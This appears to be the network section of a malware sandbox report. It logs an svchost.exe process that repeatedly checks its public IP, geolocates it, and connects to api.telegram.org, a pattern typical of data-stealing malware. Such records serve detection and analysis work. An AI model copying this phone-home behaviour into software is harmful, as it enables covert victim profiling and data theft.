Jan 3, 2025 09:21:35.635699987 CET	443	49893	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:35.783013105 CET	443	49893	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:35.783076048 CET	443	49893	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:35.783211946 CET	49893	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:35.787575960 CET	49893	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:36.054650068 CET	49888	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:36.055855989 CET	49899	443	192.168.2.7	149.154.167.220
Jan 3, 2025 09:21:36.055906057 CET	443	49899	149.154.167.220	192.168.2.7
Jan 3, 2025 09:21:36.055974007 CET	49899	443	192.168.2.7	149.154.167.220
Jan 3, 2025 09:21:36.056662083 CET	49899	443	192.168.2.7	149.154.167.220
Jan 3, 2025 09:21:36.056675911 CET	443	49899	149.154.167.220	192.168.2.7
Jan 3, 2025 09:21:36.059647083 CET	80	49888	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:36.059705973 CET	49888	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:36.684699059 CET	443	49899	149.154.167.220	192.168.2.7
Jan 3, 2025 09:21:36.684771061 CET	49899	443	192.168.2.7	149.154.167.220
Jan 3, 2025 09:21:36.686285973 CET	49899	443	192.168.2.7	149.154.167.220
Jan 3, 2025 09:21:36.686311007 CET	443	49899	149.154.167.220	192.168.2.7
Jan 3, 2025 09:21:36.686538935 CET	443	49899	149.154.167.220	192.168.2.7
Jan 3, 2025 09:21:36.687998056 CET	49899	443	192.168.2.7	149.154.167.220
Jan 3, 2025 09:21:36.731337070 CET	443	49899	149.154.167.220	192.168.2.7
Jan 3, 2025 09:21:36.930201054 CET	443	49899	149.154.167.220	192.168.2.7
Jan 3, 2025 09:21:36.930275917 CET	443	49899	149.154.167.220	192.168.2.7
Jan 3, 2025 09:21:36.930360079 CET	49899	443	192.168.2.7	149.154.167.220
Jan 3, 2025 09:21:36.933093071 CET	49899	443	192.168.2.7	149.154.167.220
Jan 3, 2025 09:21:42.711124897 CET	49838	80	192.168.2.7	132.226.247.73

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 09:21:11.273844957 CET	61842	53	192.168.2.7	1.1.1.1
Jan 3, 2025 09:21:11.281399012 CET	53	61842	1.1.1.1	192.168.2.7
Jan 3, 2025 09:21:12.511336088 CET	51605	53	192.168.2.7	1.1.1.1
Jan 3, 2025 09:21:12.518495083 CET	53	51605	1.1.1.1	192.168.2.7
Jan 3, 2025 09:21:24.106863022 CET	50299	53	192.168.2.7	1.1.1.1
Jan 3, 2025 09:21:24.114211082 CET	53	50299	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 3, 2025 09:21:11.273844957 CET	192.168.2.7	1.1.1.1	0x5cce	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 3, 2025 09:21:12.511336088 CET	192.168.2.7	1.1.1.1	0x8242	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 3, 2025 09:21:24.106863022 CET	192.168.2.7	1.1.1.1	0x61ed	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 3, 2025 09:21:11.281399012 CET	1.1.1.1	192.168.2.7	0x5cce	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 3, 2025 09:21:11.281399012 CET	1.1.1.1	192.168.2.7	0x5cce	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 3, 2025 09:21:11.281399012 CET	1.1.1.1	192.168.2.7	0x5cce	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 3, 2025 09:21:11.281399012 CET	1.1.1.1	192.168.2.7	0x5cce	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 3, 2025 09:21:11.281399012 CET	1.1.1.1	192.168.2.7	0x5cce	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 3, 2025 09:21:11.281399012 CET	1.1.1.1	192.168.2.7	0x5cce	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 3, 2025 09:21:12.518495083 CET	1.1.1.1	192.168.2.7	0x8242	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 3, 2025 09:21:12.518495083 CET	1.1.1.1	192.168.2.7	0x8242	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 3, 2025 09:21:24.114211082 CET	1.1.1.1	192.168.2.7	0x61ed	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49710	132.226.247.73	80	7344	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:21:11.298098087 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 3, 2025 09:21:11.990569115 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:11 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 3, 2025 09:21:11.998090029 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 3, 2025 09:21:12.209918022 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 3, 2025 09:21:13.964334011 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 3, 2025 09:21:14.175678015 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49733	132.226.247.73	80	7344	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:21:14.799432039 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 3, 2025 09:21:15.481419086 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49740	132.226.247.73	80	7344	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:21:16.109580994 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 3, 2025 09:21:16.779810905 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49752	132.226.247.73	80	7344	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:21:17.405138969 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 3, 2025 09:21:18.081995964 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:17 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49764	132.226.247.73	80	7344	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:21:18.704998016 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 3, 2025 09:21:19.386699915 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49772	132.226.247.73	80	7344	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:21:20.022284031 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 3, 2025 09:21:20.702958107 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49783	132.226.247.73	80	7344	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:21:21.314532042 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 3, 2025 09:21:21.996107101 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49791	132.226.247.73	80	7344	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:21:22.658443928 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 3, 2025 09:21:23.355135918 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49802	132.226.247.73	80	7588	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:21:23.526798964 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 3, 2025 09:21:24.227577925 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:24 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 3, 2025 09:21:24.234503031 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 3, 2025 09:21:24.452219963 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:24 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 3, 2025 09:21:25.559660912 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 3, 2025 09:21:25.772474051 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49827	132.226.247.73	80	7588	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:21:26.425946951 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 3, 2025 09:21:27.112889051 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49838	132.226.247.73	80	7588	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:21:27.767579079 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 3, 2025 09:21:28.465863943 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49849	132.226.247.73	80	7588	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:21:29.102637053 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 3, 2025 09:21:29.795089960 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49858	132.226.247.73	80	7588	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:21:30.454052925 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 3, 2025 09:21:31.268237114 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49868	132.226.247.73	80	7588	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:21:31.899014950 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 3, 2025 09:21:32.570352077 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49879	132.226.247.73	80	7588	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:21:33.196249008 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 3, 2025 09:21:33.866344929 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49888	132.226.247.73	80	7588	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 09:21:34.486572027 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 3, 2025 09:21:35.158082962 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 08:21:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49720	188.114.96.3	443	7344	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 08:21:13 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
